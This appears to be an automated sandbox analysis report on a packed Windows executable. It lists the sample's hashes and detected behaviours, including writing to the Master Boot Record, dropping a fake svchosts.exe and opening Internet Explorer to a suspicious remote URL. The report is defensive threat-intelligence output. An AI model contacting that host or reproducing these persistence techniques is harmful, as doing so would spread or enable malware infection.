Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
19/09/2022, 03:53
General
-
Target
6e303601af3f39756e878c1014eea78f0f89542783ee1ef02dbe66b54b154f08.exe
-
Size
88KB
-
MD5
40c4a6f1ecab4462dd086731cb551ee2
-
SHA1
40c2130399c50a697488f4503ba4f647373c0206
-
SHA256
6e303601af3f39756e878c1014eea78f0f89542783ee1ef02dbe66b54b154f08
-
SHA512
ce0cefd14164e696ec073760c9e19e6853a50c6a3ccda94555024d35e23a744f4e37b15759383753ab729b8165ecf57f7f19471f9e8e989b70c797a9bd60dde5
-
SSDEEP
1536:dXNXdlRH+Dwk4cSGesvhC8plnQ85+HwClgfTQqPTFTCtOQ8CcfiQ:ddtlRH+UxGzh3HQ85+QqoTBfiQ
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
VMProtect packed file 7 IoCs
Detects executables packed with VMProtect commercial packer.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in Windows directory 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6e303601af3f39756e878c1014eea78f0f89542783ee1ef02dbe66b54b154f08.exe"C:\Users\Admin\AppData\Local\Temp\6e303601af3f39756e878c1014eea78f0f89542783ee1ef02dbe66b54b154f08.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\windows\svchosts.exeC:\windows\svchosts.exe auto2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\progra~1\Intern~1\iexplore.exeC:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=QM00013&isqq=32⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1336 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
599B
MD5972f83524898a1b4edc5d4528a29f94b
SHA12da79da46683406d3c5b2044cd604fc6ffdef44e
SHA25606ebf6b12fd2bb0b1fc3b429d19eb0c6427c377388667c84d7d5113a0172d62d
SHA5125ba0d6b14da614d0a3646db48b17160c864963742bf85815b383a46057000bb254d1c4f810c3afb73fc42c40d98ec9ed533585d34436d43c92539914212ae3ca
-
Filesize
88KB
MD540c4a6f1ecab4462dd086731cb551ee2
SHA140c2130399c50a697488f4503ba4f647373c0206
SHA2566e303601af3f39756e878c1014eea78f0f89542783ee1ef02dbe66b54b154f08
SHA512ce0cefd14164e696ec073760c9e19e6853a50c6a3ccda94555024d35e23a744f4e37b15759383753ab729b8165ecf57f7f19471f9e8e989b70c797a9bd60dde5
-
Filesize
8KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB
-
Filesize
196KB